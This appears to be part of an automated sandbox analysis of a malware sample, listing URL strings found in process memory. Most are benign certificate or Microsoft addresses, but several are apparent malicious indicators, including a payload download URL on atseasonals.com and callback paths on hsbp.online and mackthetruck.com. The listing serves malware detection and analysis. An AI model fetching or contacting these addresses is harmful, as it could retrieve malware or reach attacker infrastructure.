Source: Zr26f1rL6r.exe, 0000000A.00000003.47750089783.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47747204902.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749712400.0000000000897000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47940136411.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749088416.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47748575933.000000000089B000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 0000000E.00000000.48061449754.000000000D0F5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000E.00000000.47784400038.000000000EEE1000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068529513.000000000EEE1000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47830937531.000000000EEE1000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883514679.000000000EEE1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlAw
Source: explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825946128.000000000D431000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48062680086.000000000D431000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47877800725.000000000D431000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779736099.000000000D431000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000E.00000000.47770414117.00000000099E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47869230194.000000000AB30000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47854578029.0000000003060000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: rundll32.exe, 0000000F.00000002.51929871775.0000000004981000.00000004.00020000.sdmp	String found in binary or memory: http://www.hsbp.online
Source: rundll32.exe, 0000000F.00000002.51919439469.00000000005D2000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/n8ds/
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/n8ds/%
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/n8ds/J
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp	String found in binary or memory: http://www.inklusion.online
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp	String found in binary or memory: http://www.inklusion.online/
Source: rundll32.exe, 0000000F.00000002.51930419796.000000000507B000.00000004.00020000.sdmp	String found in binary or memory: http://www.mackthetruck.com
Source: rundll32.exe, 0000000F.00000002.51930419796.000000000507B000.00000004.00020000.sdmp	String found in binary or memory: http://www.mackthetruck.com/n8ds/
Source: explorer.exe, 0000000E.00000000.48048119623.0000000009690000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47864616696.0000000009690000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47768196701.0000000009690000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47812562770.0000000009690000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/0
Source: explorer.exe, 0000000E.00000000.47854651086.0000000003070000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000E.00000000.47874813973.000000000CF16000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47776930012.000000000CF16000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47822671191.000000000CF16000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48059253860.000000000CF16000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.47768699367.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47813132765.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48048687198.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47865140469.0000000009713000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/
Source: c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/(C
Source: c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin
Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin5
Source: c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin7
Source: c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin:
Source: c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin?
Source: c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binN
Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binZ
Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binc
Source: c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binf
Source: c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binh
Source: c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binki
Source: c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binr
Source: c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binsj
Source: c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binv
Source: c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/GHrtt/bin_kbJoepxz175.binz
Source: c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/O
Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	String found in binary or memory: https://atseasonals.com/V
Source: c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/j
Source: c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: https://atseasonals.com/r
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmp	String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: explorer.exe, 0000000E.00000000.47775127942.000000000CD93000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47873120165.000000000CD93000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057484890.000000000CD93000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47821015918.000000000CD93000.00000004.00000001.sdmp	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp	String found in binary or memory: https://excel.office.comR
Source: explorer.exe, 0000000E.00000000.47764488527.0000000005202000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044007267.0000000005202000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860582752.0000000005202000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47808989078.0000000005202000.00000004.00000001.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBm8qVB.img
Source: explorer.exe, 0000000E.00000000.47883732426.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068764789.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47784748807.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47784599668.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883880392.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068924445.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831331678.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831166569.000000000EF08000.00000004.00000001.sdmp	String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: DB1.23.dr	String found in binary or memory: https://login.live.com/
Source: rundll32.exe, 0000000F.00000002.51919311329.00000000005CB000.00000004.00000020.sdmp, cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.dr	String found in binary or memory: https://login.live.com//
Source: cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.dr	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: rundll32.exe, 0000000F.00000002.51919311329.00000000005CB000.00000004.00000020.sdmp, cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.dr	String found in binary or memory: https://login.live.com/v104
Source: explorer.exe, 0000000E.00000000.47821015918.000000000CD93000.00000004.00000001.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp	String found in binary or memory: https://word.office.comERM
Source: explorer.exe, 0000000E.00000000.47823088938.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47777354065.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47877256176.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779217096.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47804704949.000000000315A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48062074884.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47875315528.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825427484.000000000D231000.00000004.00000001.sdmp, rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehpf
Source: explorer.exe, 0000000E.00000000.47784748807.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883880392.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068924445.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831331678.000000000EF25000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmp	String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.unitedmetal-saudi.com
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmp	String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png

Posts data to webserver

Source: unknown

